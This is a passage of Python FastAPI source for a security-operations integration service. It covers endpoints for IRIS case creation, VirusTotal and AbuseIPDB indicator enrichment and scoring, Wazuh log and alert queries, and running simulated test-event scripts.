  672. except Exception as exc:
  673. raise HTTPException(status_code=502, detail=f"Shuffle call failed: {exc}") from exc
  674. return ApiResponse(data={"shuffle": result})
  675. @app.post(
  676. "/action/create-iris-case",
  677. response_model=ApiResponse,
  678. summary="Create IRIS case (action)",
  679. description="Create an IRIS case using action payload fields and defaults.",
  680. )
  681. async def create_iris_case(payload: ActionCreateIncidentRequest) -> ApiResponse:
  682. # IRIS v2 expects case_name, case_description, case_customer, case_soc_id.
  683. case_payload = {
  684. "case_name": payload.title,
  685. "case_description": payload.payload.get("description", "Created by soc-integrator"),
  686. "case_customer": payload.payload.get("case_customer", settings.iris_default_customer_id),
  687. "case_soc_id": payload.payload.get("case_soc_id", settings.iris_default_soc_id),
  688. }
  689. try:
  690. iris_result = await iris_adapter.create_case(case_payload)
  691. except Exception as exc:
  692. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  693. return ApiResponse(data={"iris": iris_result})
  694. @app.post(
  695. "/iris/tickets",
  696. response_model=ApiResponse,
  697. summary="Create IRIS ticket",
  698. description="Create an IRIS case/ticket directly using ticket request model.",
  699. )
  700. async def iris_create_ticket(payload: IrisTicketCreateRequest) -> ApiResponse:
  701. case_payload = {
  702. "case_name": payload.title,
  703. "case_description": payload.description,
  704. "case_customer": payload.case_customer or settings.iris_default_customer_id,
  705. "case_soc_id": payload.case_soc_id or settings.iris_default_soc_id,
  706. }
  707. if payload.payload:
  708. case_payload.update(payload.payload)
  709. try:
  710. iris_result = await iris_adapter.create_case(case_payload)
  711. except Exception as exc:
  712. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  713. return ApiResponse(data={"iris": iris_result})
  714. @app.get(
  715. "/iris/tickets",
  716. response_model=ApiResponse,
  717. summary="List IRIS tickets",
  718. description="List IRIS cases with pagination, using v2 or legacy fallback endpoint.",
  719. )
  720. async def iris_list_tickets(limit: int = 50, offset: int = 0) -> ApiResponse:
  721. try:
  722. iris_result = await iris_adapter.list_cases(limit=limit, offset=offset)
  723. except Exception as exc:
  724. raise HTTPException(status_code=502, detail=f"IRIS call failed: {exc}") from exc
  725. return ApiResponse(data={"iris": iris_result})
  726. def _build_vt_ioc_result(
  727. vt: dict[str, object],
  728. ioc_type: str,
  729. ioc_value: str,
  730. malicious_threshold: int,
  731. suspicious_threshold: int,
  732. ) -> tuple[dict[str, object], bool, str, float]:
  733. stats = (
  734. (((vt.get("data") or {}).get("attributes") or {}).get("last_analysis_stats"))
  735. if isinstance(vt, dict)
  736. else None
  737. ) or {}
  738. malicious = int(stats.get("malicious", 0) or 0)
  739. suspicious = int(stats.get("suspicious", 0) or 0)
  740. harmless = int(stats.get("harmless", 0) or 0)
  741. undetected = int(stats.get("undetected", 0) or 0)
  742. total = malicious + suspicious + harmless + undetected
  743. confidence = 0.0 if total == 0 else round(((malicious + (0.5 * suspicious)) / total), 4)
  744. matched = (malicious >= malicious_threshold) or (suspicious >= suspicious_threshold)
  745. severity = "low"
  746. if malicious >= 5 or suspicious >= 10:
  747. severity = "critical"
  748. elif malicious >= 2 or suspicious >= 5:
  749. severity = "high"
  750. elif malicious >= 1 or suspicious >= 1:
  751. severity = "medium"
  752. reason = (
  753. f"virustotal_stats malicious={malicious} suspicious={suspicious} "
  754. f"thresholds(malicious>={malicious_threshold}, suspicious>={suspicious_threshold})"
  755. )
  756. result: dict[str, object] = {
  757. "ioc_type": ioc_type,
  758. "ioc_value": ioc_value,
  759. "matched": matched,
  760. "severity": severity,
  761. "confidence": confidence,
  762. "reason": reason,
  763. "providers": {
  764. "virustotal": {
  765. "stats": stats,
  766. }
  767. },
  768. "raw": {
  769. "virustotal": vt,
  770. },
  771. }
  772. return result, matched, severity, confidence
  773. def _build_abuseipdb_ioc_result(
  774. abuse: dict[str, object],
  775. ioc_value: str,
  776. confidence_threshold: int = 50,
  777. ) -> tuple[dict[str, object], bool, str, float]:
  778. data = ((abuse.get("data") if isinstance(abuse, dict) else None) or {}) if isinstance(abuse, dict) else {}
  779. score = int(data.get("abuseConfidenceScore", 0) or 0)
  780. total_reports = int(data.get("totalReports", 0) or 0)
  781. matched = score >= confidence_threshold
  782. severity = "low"
  783. if score >= 90:
  784. severity = "critical"
  785. elif score >= 70:
  786. severity = "high"
  787. elif score >= 30:
  788. severity = "medium"
  789. confidence = round(score / 100.0, 4)
  790. reason = f"abuseipdb score={score} totalReports={total_reports} threshold>={confidence_threshold}"
  791. result: dict[str, object] = {
  792. "ioc_type": "ip",
  793. "ioc_value": ioc_value,
  794. "matched": matched,
  795. "severity": severity,
  796. "confidence": confidence,
  797. "reason": reason,
  798. "providers": {"abuseipdb": {"score": score, "totalReports": total_reports, "raw": abuse}},
  799. }
  800. return result, matched, severity, confidence
  801. def _extract_first_array(payload: object) -> list[object]:
  802. if isinstance(payload, list):
  803. return payload
  804. if not isinstance(payload, dict):
  805. return []
  806. preferred_keys = [
  807. "items",
  808. "results",
  809. "workflows",
  810. "apps",
  811. "affected_items",
  812. "data",
  813. ]
  814. for key in preferred_keys:
  815. value = payload.get(key)
  816. if isinstance(value, list):
  817. return value
  818. for value in payload.values():
  819. extracted = _extract_first_array(value)
  820. if extracted:
  821. return extracted
  822. return []
  823. SIM_SCRIPT_MAP: dict[str, str] = {
  824. "fortigate": "send-wazuh-fortigate-test-events.sh",
  825. "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
  826. "cisco": "send-wazuh-cisco-test-events.sh",
  827. "proposal_required": "send-wazuh-proposal-required-events.sh",
  828. "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
  829. "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
  830. "wazuh_test": "send-wazuh-test-events.sh",
  831. }
  832. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  833. script_name = SIM_SCRIPT_MAP[payload.script]
  834. script_path = SIM_SCRIPTS_DIR / script_name
  835. count = max(1, int(payload.count))
  836. delay = max(0.0, float(payload.delay_seconds))
  837. if payload.script == "endpoint":
  838. cmd = [
  839. "/bin/bash",
  840. str(script_path),
  841. payload.target or "all",
  842. payload.scenario or "all",
  843. str(count),
  844. str(delay),
  845. ]
  846. else:
  847. cmd = [
  848. "/bin/bash",
  849. str(script_path),
  850. payload.target or "all",
  851. str(count),
  852. str(delay),
  853. ]
  854. if payload.forever:
  855. cmd.append("--forever")
  856. return cmd
  857. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  858. process = run.get("process")
  859. poll_code = process.poll() if process else None
  860. return_code = run.get("return_code")
  861. if poll_code is not None and return_code is None:
  862. run["return_code"] = poll_code
  863. return_code = poll_code
  864. return {
  865. "run_id": run_id,
  866. "script": run.get("script"),
  867. "target": run.get("target"),
  868. "scenario": run.get("scenario"),
  869. "count": run.get("count"),
  870. "delay_seconds": run.get("delay_seconds"),
  871. "forever": run.get("forever"),
  872. "pid": run.get("pid"),
  873. "cmd": run.get("cmd"),
  874. "started_at": run.get("started_at"),
  875. "stopped_at": run.get("stopped_at"),
  876. "running": bool(process and process.poll() is None),
  877. "return_code": return_code,
  878. "log_file": run.get("log_file"),
  879. }
  880. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  881. line_limit = max(1, min(int(limit), 1000))
  882. lines: deque[str] = deque(maxlen=line_limit)
  883. try:
  884. with path.open("r", encoding="utf-8", errors="replace") as handle:
  885. for line in handle:
  886. lines.append(line.rstrip("\n"))
  887. except FileNotFoundError:
  888. return []
  889. return list(lines)
  890. def _safe_query_token(value: object) -> str | None:
  891. text = str(value or "").strip()
  892. if not text:
  893. return None
  894. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  895. return None
  896. return text
  897. def _parse_iso_datetime(value: object) -> datetime | None:
  898. text = str(value or "").strip()
  899. if not text:
  900. return None
  901. if text.endswith("Z"):
  902. text = text[:-1] + "+00:00"
  903. try:
  904. parsed = datetime.fromisoformat(text)
  905. except ValueError:
  906. return None
  907. if parsed.tzinfo is None:
  908. parsed = parsed.replace(tzinfo=timezone.utc)
  909. return parsed.astimezone(timezone.utc)
  910. def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
  911. script = str(run.get("script") or "").strip().lower()
  912. target = str(run.get("target") or "all").strip()
  913. scenario = str(run.get("scenario") or "all").strip().lower()
  914. target_token = _safe_query_token(target)
  915. _ = scenario
  916. clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
  917. if script == "fortigate":
  918. clauses.append(
  919. "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
  920. "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
  921. )
  922. if target_token and target_token.lower() != "all":
  923. clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
  924. elif script == "endpoint":
  925. if target_token and target_token.lower() != "all":
  926. lowered = target_token.lower()
  927. if lowered in {"windows", "win"}:
  928. clauses.append(
  929. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  930. "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
  931. )
  932. elif lowered in {"mac", "macos"}:
  933. clauses.append(
  934. "(full_log:*source=mac* OR full_log:*source=mac_agent* "
  935. "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
  936. )
  937. elif lowered == "linux":
  938. clauses.append(
  939. "(full_log:*source=linux* OR full_log:*source=linux_agent* "
  940. "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
  941. )
  942. else:
  943. clauses.append(f"full_log:*{target_token}*")
  944. else:
  945. clauses.append(
  946. "(full_log:*source=windows* OR full_log:*source=windows_agent* "
  947. "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
  948. "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
  949. "OR data.source:windows OR data.source:windows_agent "
  950. "OR data.source:mac OR data.source:mac_agent "
  951. "OR data.source:linux OR data.source:linux_agent)"
  952. )
  953. elif script == "cisco":
  954. clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
  955. if target_token and target_token.lower() != "all":
  956. clauses.append(f"full_log:*{target_token}*")
  957. elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
  958. clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
  959. if target_token and target_token.lower() != "all":
  960. clauses.append(f"full_log:*{target_token}*")
  961. else:
  962. clauses.append("full_log:*soc_mvp_test=true*")
  963. return clauses
  964. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  965. if not isinstance(payload, dict):
  966. return []
  967. hits_root = payload.get("hits")
  968. if not isinstance(hits_root, dict):
  969. return []
  970. hits = hits_root.get("hits")
  971. if not isinstance(hits, list):
  972. return []
  973. result: list[dict[str, object]] = []
  974. for hit in hits:
  975. if isinstance(hit, dict):
  976. result.append(hit)
  977. return result
  978. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  979. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  980. source = source if isinstance(source, dict) else {}
  981. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  982. agent = agent if isinstance(agent, dict) else {}
  983. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  984. decoder = decoder if isinstance(decoder, dict) else {}
  985. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  986. data = data if isinstance(data, dict) else {}
  987. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  988. rule = rule if isinstance(rule, dict) else {}
  989. item: dict[str, object] = {
  990. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  991. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  992. "agent_name": agent.get("name"),
  993. "agent_id": agent.get("id"),
  994. "decoder_name": decoder.get("name"),
  995. "source": data.get("source"),
  996. "event_type": data.get("event_type"),
  997. "severity": data.get("severity"),
  998. "rule_id": rule.get("id"),
  999. "rule_description": rule.get("description"),
  1000. "full_log": source.get("full_log"),
  1001. }
  1002. if include_raw:
  1003. item["raw"] = source
  1004. return item
  1005. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1006. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1007. source = source if isinstance(source, dict) else {}
  1008. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1009. rule = rule if isinstance(rule, dict) else {}
  1010. rule_id = rule.get("id")
  1011. if rule_id in {None, ""}:
  1012. return None
  1013. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1014. agent = agent if isinstance(agent, dict) else {}
  1015. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1016. data = data if isinstance(data, dict) else {}
  1017. item: dict[str, object] = {
  1018. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1019. "rule_id": rule_id,
  1020. "rule_level": rule.get("level"),
  1021. "rule_description": rule.get("description"),
  1022. "rule_firedtimes": rule.get("firedtimes"),
  1023. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1024. "agent_name": agent.get("name"),
  1025. "full_log": source.get("full_log"),
  1026. }
  1027. if include_raw:
  1028. item["raw"] = source
  1029. return item
  1030. @app.post(
  1031. "/ioc/enrich",
  1032. response_model=ApiResponse,
  1033. summary="IOC enrich",
  1034. description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
  1035. )
  1036. async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
  1037. providers = [p.lower().strip() for p in payload.providers]
  1038. result: dict[str, object] = {
  1039. "ioc_type": payload.ioc_type,
  1040. "ioc_value": payload.ioc_value,
  1041. "providers_requested": providers,
  1042. "providers": {},
  1043. }
  1044. if "virustotal" in providers:
  1045. try:
  1046. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1047. result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
  1048. except Exception as exc:
  1049. repo.add_ioc_trace(
  1050. action="enrich",
  1051. ioc_type=payload.ioc_type,
  1052. ioc_value=payload.ioc_value,
  1053. providers=providers,
  1054. request_payload=payload.model_dump(mode="json"),
  1055. response_payload={},
  1056. error=str(exc),
  1057. )
  1058. raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
  1059. if "abuseipdb" in providers:
  1060. if payload.ioc_type != "ip":
  1061. result["providers"] = {
  1062. **(result.get("providers") or {}),
  1063. "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
  1064. }
  1065. else:
  1066. try:
  1067. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1068. result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
  1069. except Exception as exc:
  1070. repo.add_ioc_trace(
  1071. action="enrich",
  1072. ioc_type=payload.ioc_type,
  1073. ioc_value=payload.ioc_value,
  1074. providers=providers,
  1075. request_payload=payload.model_dump(mode="json"),
  1076. response_payload={},
  1077. error=str(exc),
  1078. )
  1079. raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
  1080. repo.add_ioc_trace(
  1081. action="enrich",
  1082. ioc_type=payload.ioc_type,
  1083. ioc_value=payload.ioc_value,
  1084. providers=providers,
  1085. request_payload=payload.model_dump(mode="json"),
  1086. response_payload=result,
  1087. )
  1088. return ApiResponse(data={"ioc": result})
  1089. @app.post(
  1090. "/ioc/evaluate",
  1091. response_model=ApiResponse,
  1092. summary="IOC evaluate",
  1093. description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
  1094. )
  1095. async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
  1096. providers = [p.lower().strip() for p in payload.providers]
  1097. supported = {"virustotal", "abuseipdb"}
  1098. requested = [p for p in providers if p in supported]
  1099. if not requested:
  1100. raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
  1101. per_provider: dict[str, dict[str, object]] = {}
  1102. errors: dict[str, str] = {}
  1103. if "virustotal" in requested:
  1104. try:
  1105. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1106. vt_result, _, _, _ = _build_vt_ioc_result(
  1107. vt=vt,
  1108. ioc_type=payload.ioc_type,
  1109. ioc_value=payload.ioc_value,
  1110. malicious_threshold=payload.malicious_threshold,
  1111. suspicious_threshold=payload.suspicious_threshold,
  1112. )
  1113. per_provider["virustotal"] = vt_result
  1114. except Exception as exc:
  1115. errors["virustotal"] = str(exc)
  1116. if "abuseipdb" in requested:
  1117. if payload.ioc_type != "ip":
  1118. errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
  1119. else:
  1120. try:
  1121. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1122. abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
  1123. abuse=abuse,
  1124. ioc_value=payload.ioc_value,
  1125. confidence_threshold=50,
  1126. )
  1127. per_provider["abuseipdb"] = abuse_result
  1128. except Exception as exc:
  1129. errors["abuseipdb"] = str(exc)
  1130. if not per_provider:
  1131. repo.add_ioc_trace(
  1132. action="evaluate",
  1133. ioc_type=payload.ioc_type,
  1134. ioc_value=payload.ioc_value,
  1135. providers=requested,
  1136. request_payload=payload.model_dump(mode="json"),
  1137. response_payload={},
  1138. error=str(errors),
  1139. )
  1140. raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
  1141. # aggregate decision (max confidence/severity, matched if any provider matched)
  1142. order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
  1143. matched = any(bool(r.get("matched")) for r in per_provider.values())
  1144. confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
  1145. severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
  1146. reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
  1147. if errors:
  1148. reason_parts.append(f"errors={errors}")
  1149. ioc_result = {
  1150. "ioc_type": payload.ioc_type,
  1151. "ioc_value": payload.ioc_value,
  1152. "matched": matched,
  1153. "severity": severity,
  1154. "confidence": round(confidence, 4),
  1155. "reason": " | ".join(reason_parts),
  1156. "providers": per_provider,
  1157. }
  1158. repo.add_ioc_trace(
  1159. action="evaluate",
  1160. ioc_type=payload.ioc_type,
  1161. ioc_value=payload.ioc_value,
  1162. providers=providers,
  1163. request_payload=payload.model_dump(mode="json"),
  1164. response_payload=ioc_result,
  1165. matched=matched,
  1166. severity=severity,
  1167. confidence=float(ioc_result["confidence"]),
  1168. )
  1169. return ApiResponse(data={"ioc": ioc_result})
  1170. @app.post(
  1171. "/ioc/upload-file",
  1172. response_model=ApiResponse,
  1173. summary="Upload file to VirusTotal",
  1174. description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
  1175. )
  1176. async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
  1177. content = await file.read()
  1178. if not content:
  1179. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1180. try:
  1181. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1182. except Exception as exc:
  1183. repo.add_ioc_trace(
  1184. action="upload_file",
  1185. ioc_type="hash",
  1186. ioc_value=file.filename or "<unknown>",
  1187. providers=["virustotal"],
  1188. request_payload={"filename": file.filename, "size": len(content)},
  1189. response_payload={},
  1190. error=str(exc),
  1191. )
  1192. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1193. repo.add_ioc_trace(
  1194. action="upload_file",
  1195. ioc_type="hash",
  1196. ioc_value=file.filename or "<unknown>",
  1197. providers=["virustotal"],
  1198. request_payload={"filename": file.filename, "size": len(content)},
  1199. response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
  1200. )
  1201. return ApiResponse(data={"virustotal": vt_upload})
  1202. @app.get(
  1203. "/ioc/analysis/{analysis_id}",
  1204. response_model=ApiResponse,
  1205. summary="Get VirusTotal analysis",
  1206. description="Fetch analysis status/details from VirusTotal by analysis ID.",
  1207. )
  1208. async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
  1209. try:
  1210. vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
  1211. except Exception as exc:
  1212. repo.add_ioc_trace(
  1213. action="analysis",
  1214. ioc_type="hash",
  1215. ioc_value=analysis_id,
  1216. providers=["virustotal"],
  1217. request_payload={"analysis_id": analysis_id},
  1218. response_payload={},
  1219. error=str(exc),
  1220. )
  1221. raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
  1222. repo.add_ioc_trace(
  1223. action="analysis",
  1224. ioc_type="hash",
  1225. ioc_value=analysis_id,
  1226. providers=["virustotal"],
  1227. request_payload={"analysis_id": analysis_id},
  1228. response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
  1229. )
  1230. return ApiResponse(data={"virustotal": vt_analysis})
  1231. @app.post(
  1232. "/ioc/evaluate-file",
  1233. response_model=ApiResponse,
  1234. summary="Evaluate uploaded file IOC",
  1235. description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
  1236. )
  1237. async def ioc_evaluate_file(
  1238. file: UploadFile = File(...),
  1239. malicious_threshold: int = 1,
  1240. suspicious_threshold: int = 3,
  1241. poll_timeout_seconds: int = 30,
  1242. poll_interval_seconds: int = 2,
  1243. ) -> ApiResponse:
  1244. content = await file.read()
  1245. if not content:
  1246. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1247. try:
  1248. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1249. except Exception as exc:
  1250. repo.add_ioc_trace(
  1251. action="evaluate_file",
  1252. ioc_type="hash",
  1253. ioc_value=file.filename or "<unknown>",
  1254. providers=["virustotal"],
  1255. request_payload={"filename": file.filename, "size": len(content)},
  1256. response_payload={},
  1257. error=str(exc),
  1258. )
  1259. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1260. analysis_id = (
  1261. (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
  1262. or ""
  1263. )
  1264. if not analysis_id:
  1265. raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
  1266. timeout = max(1, poll_timeout_seconds)
  1267. interval = max(1, poll_interval_seconds)
  1268. elapsed = 0
  1269. analysis: dict[str, object] = {}
  1270. while elapsed <= timeout:
  1271. analysis = await virustotal_adapter.get_analysis(analysis_id)
  1272. status = (
  1273. (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
  1274. if isinstance(analysis, dict)
  1275. else None
  1276. )
  1277. if status == "completed":
  1278. break
  1279. await asyncio.sleep(interval)
  1280. elapsed += interval
  1281. sha256 = (
  1282. (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
  1283. if isinstance(analysis, dict)
  1284. else None
  1285. )
  1286. if not sha256:
  1287. raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
  1288. try:
  1289. vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
  1290. except Exception as exc:
  1291. repo.add_ioc_trace(
  1292. action="evaluate_file",
  1293. ioc_type="hash",
  1294. ioc_value=str(sha256),
  1295. providers=["virustotal"],
  1296. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1297. response_payload={"upload": vt_upload, "analysis": analysis},
  1298. error=str(exc),
  1299. )
  1300. raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
  1301. ioc_result, matched, severity, confidence = _build_vt_ioc_result(
  1302. vt=vt_file,
  1303. ioc_type="hash",
  1304. ioc_value=str(sha256),
  1305. malicious_threshold=malicious_threshold,
  1306. suspicious_threshold=suspicious_threshold,
  1307. )
  1308. ioc_result["analysis_id"] = analysis_id
  1309. ioc_result["filename"] = file.filename
  1310. repo.add_ioc_trace(
  1311. action="evaluate_file",
  1312. ioc_type="hash",
  1313. ioc_value=str(sha256),
  1314. providers=["virustotal"],
  1315. request_payload={"filename": file.filename, "analysis_id": analysis_id},
  1316. response_payload={
  1317. "upload": vt_upload,
  1318. "analysis": analysis,
  1319. "ioc": ioc_result,
  1320. },
  1321. matched=matched,
  1322. severity=severity,
  1323. confidence=confidence,
  1324. )
  1325. return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
  1326. @app.get(
  1327. "/ioc/history",
  1328. response_model=ApiResponse,
  1329. summary="IOC trace history",
  1330. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1331. )
  1332. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1333. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1334. @app.get(
  1335. "/geoip/{ip}",
  1336. response_model=ApiResponse,
  1337. summary="GeoIP lookup",
  1338. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1339. )
  1340. async def geoip_lookup(ip: str) -> ApiResponse:
  1341. result = await geoip_adapter.lookup(ip)
  1342. return ApiResponse(data={"geoip": result})
  1343. @app.get(
  1344. "/sync/wazuh-version",
  1345. response_model=ApiResponse,
  1346. summary="Wazuh version",
  1347. description="Get Wazuh API/manager version information through adapter.",
  1348. )
  1349. async def sync_wazuh_version() -> ApiResponse:
  1350. try:
  1351. wazuh_result = await wazuh_adapter.get_version()
  1352. except Exception as exc:
  1353. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1354. return ApiResponse(data={"wazuh": wazuh_result})
  1355. @app.get(
  1356. "/wazuh/auth-test",
  1357. response_model=ApiResponse,
  1358. summary="Wazuh auth test",
  1359. description="Validate Wazuh API authentication using configured credentials.",
  1360. )
  1361. async def wazuh_auth_test() -> ApiResponse:
  1362. try:
  1363. result = await wazuh_adapter.auth_test()
  1364. except Exception as exc:
  1365. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1366. return ApiResponse(data={"wazuh": result})
  1367. @app.get(
  1368. "/wazuh/manager-info",
  1369. response_model=ApiResponse,
  1370. summary="Wazuh manager info",
  1371. description="Return manager information from Wazuh API.",
  1372. )
  1373. async def wazuh_manager_info() -> ApiResponse:
  1374. try:
  1375. result = await wazuh_adapter.get_manager_info()
  1376. except Exception as exc:
  1377. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1378. return ApiResponse(data={"wazuh": result})
  1379. @app.get(
  1380. "/wazuh/agents",
  1381. response_model=ApiResponse,
  1382. summary="List Wazuh agents",
  1383. description="List registered Wazuh agents with pagination and optional field selection.",
  1384. )
  1385. async def wazuh_agents(
  1386. limit: int = 50,
  1387. offset: int = 0,
  1388. select: str | None = None,
  1389. ) -> ApiResponse:
  1390. try:
  1391. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1392. except Exception as exc:
  1393. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1394. return ApiResponse(data={"wazuh": result})
  1395. @app.get(
  1396. "/wazuh/alerts",
  1397. response_model=ApiResponse,
  1398. summary="List Wazuh alerts",
  1399. description="List alert-like entries from manager logs API for current Wazuh build.",
  1400. )
  1401. async def wazuh_alerts(
  1402. limit: int = 50,
  1403. offset: int = 0,
  1404. q: str | None = None,
  1405. sort: str | None = None,
  1406. ) -> ApiResponse:
  1407. try:
  1408. # In this Wazuh build, API alerts are exposed via manager logs.
  1409. result = await wazuh_adapter.list_manager_logs(
  1410. limit=limit, offset=offset, q=q, sort=sort
  1411. )
  1412. except Exception as exc:
  1413. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1414. return ApiResponse(data={"wazuh": result})
  1415. @app.get(
  1416. "/wazuh/manager-logs",
  1417. response_model=ApiResponse,
  1418. summary="List Wazuh manager logs",
  1419. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1420. )
  1421. async def wazuh_manager_logs(
  1422. limit: int = 50,
  1423. offset: int = 0,
  1424. q: str | None = None,
  1425. sort: str | None = None,
  1426. ) -> ApiResponse:
  1427. try:
  1428. result = await wazuh_adapter.list_manager_logs(
  1429. limit=limit, offset=offset, q=q, sort=sort
  1430. )
  1431. except Exception as exc:
  1432. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1433. return ApiResponse(data={"wazuh": result})
  1434. @app.post(
  1435. "/wazuh/sync-to-mvp",
  1436. response_model=ApiResponse,
  1437. dependencies=[Depends(require_internal_api_key)],
  1438. summary="Sync Wazuh to MVP",
  1439. description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.",
  1440. )
  1441. async def wazuh_sync_to_mvp(
  1442. limit: int = 50,
  1443. minutes: int = 120,
  1444. q: str = "soc_mvp_test=true OR event_type:*",
  1445. ) -> ApiResponse:
  1446. try:
  1447. result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes)
  1448. except Exception as exc:
  1449. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1450. return ApiResponse(data={"sync": result})
  1451. @app.get(
  1452. "/wazuh/auto-sync/status",
  1453. response_model=ApiResponse,
  1454. summary="Wazuh auto-sync status",
  1455. description="Show auto-sync enablement, settings, task runtime state, and last sync result.",
  1456. )
  1457. async def wazuh_auto_sync_status() -> ApiResponse:
  1458. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1459. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1460. return ApiResponse(
  1461. data={
  1462. "enabled": settings.wazuh_auto_sync_enabled,
  1463. "task_running": bool(task and not task.done()),
  1464. "settings": {
  1465. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1466. "limit": settings.wazuh_auto_sync_limit,
  1467. "minutes": settings.wazuh_auto_sync_minutes,
  1468. "query": settings.wazuh_auto_sync_query,
  1469. },
